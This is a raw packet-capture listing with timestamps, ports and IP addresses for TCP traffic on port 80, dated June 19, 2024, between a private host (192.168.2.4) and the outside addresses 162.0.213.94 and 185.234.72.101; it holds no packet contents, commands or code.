                                                                            Jun 19, 2024 22:40:10.974332094 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974370003 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974391937 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974392891 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974392891 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974482059 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974613905 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974684000 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974740028 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.980103970 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.980180025 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.980217934 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.980349064 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:11.060668945 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:11.060759068 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:11.060792923 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:11.060864925 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:11.060864925 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:11.892704010 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.916630983 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.922688007 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.922811985 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.924845934 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.930260897 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930305958 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930334091 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930361986 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930389881 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930444002 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930473089 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930499077 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930526972 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718149900 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718221903 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718257904 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718291044 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718301058 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.718326092 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718359947 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718394041 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.718426943 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718461990 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718496084 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718504906 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.718534946 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718578100 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.721205950 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.723939896 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.723989964 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.724028111 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.724107027 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.767563105 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.804776907 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.804826021 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.804864883 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.805036068 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:14.439508915 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.458201885 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.463670015 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:15.466281891 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.470191002 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.475910902 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:16.099117041 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:16.099296093 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:16.102232933 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:16.106177092 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:16.111809015 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:17.152287960 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.161904097 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.161983967 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.162128925 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.167488098 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807693005 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807751894 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807789087 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807821989 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807857037 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807857037 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807857037 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807893991 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807919025 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807929039 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183043003 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183053017 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183087111 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183167934 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183331013 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183363914 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183397055 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183428049 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183429003 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183468103 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183501005 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183532000 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183535099 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183568954 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183651924 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183669090 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183703899 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183736086 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183769941 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183788061 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183788061 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183806896 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183829069 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183840036 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183871031 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183873892 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183911085 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183943033 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.183974028 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.183976889 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184009075 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.184012890 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184150934 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.184274912 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184472084 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184535027 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184561968 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.184570074 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184604883 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184637070 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184660912 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.184669971 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184703112 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184736013 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184765100 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.184767962 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184803009 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184837103 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.184866905 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.184871912 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185209036 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185241938 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185273886 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.185275078 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185308933 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185343027 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185373068 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.185376883 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185760975 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185794115 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185823917 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.185827017 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185861111 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185894966 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.185925961 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.186136961 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.269633055 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.270150900 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.274997950 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275051117 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275161028 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275197029 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275232077 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275232077 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275266886 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275269985 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275305986 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275397062 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275429964 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275430918 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275491953 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275525093 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275557041 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275557041 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275593996 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275626898 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275657892 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275660992 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275717020 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275749922 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275783062 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275783062 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275834084 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275868893 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275902033 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275907993 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.275937080 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.275969982 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276001930 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276002884 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.276036978 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276077986 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276108980 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.276112080 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276146889 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276180029 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276210070 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.276213884 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276247978 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276287079 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.276319981 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277003050 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277056932 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277093887 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277126074 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277127981 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277163982 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277200937 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277234077 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277235031 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277267933 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277322054 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277354956 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277355909 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277391911 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277421951 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277448893 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277461052 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277494907 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277529001 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277559996 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277560949 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277595997 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277627945 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277714014 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277717113 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277751923 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277806044 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277837038 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277837992 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277873993 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277908087 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277939081 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.277940035 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.277975082 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278007984 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278040886 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278040886 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278076887 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278110981 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278112888 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278145075 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278175116 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278179884 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278213024 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278247118 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278278112 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278278112 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278312922 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278346062 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278377056 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278378010 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278414011 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278506994 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278520107 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278556108 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278701067 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278724909 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278775930 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278809071 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278837919 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278841972 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278875113 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278911114 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278939962 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.278944016 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.278980970 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279015064 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279048920 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279059887 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.279083014 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279117107 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279149055 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.279149055 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279185057 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279217958 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279251099 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279252052 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.279285908 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279392004 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.279750109 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279783964 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.279817104 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457551003 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457561970 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457586050 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457596064 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457621098 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457624912 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457654953 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457663059 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457690001 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457694054 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457753897 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.457779884 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.457822084 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458144903 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458180904 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458190918 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458214998 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458223104 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458250046 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458282948 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458292007 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458317041 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458324909 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458352089 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458362103 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458386898 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458410025 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458422899 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458427906 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458457947 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458467007 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458493948 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458499908 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458527088 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458534956 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.458565950 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.458610058 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459197044 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459244967 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459248066 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459285021 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459290028 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459321022 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459327936 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459362984 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459378004 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459419012 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459454060 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459460974 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.459489107 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.459503889 CEST4976580192.168.2.4185.234.72.101
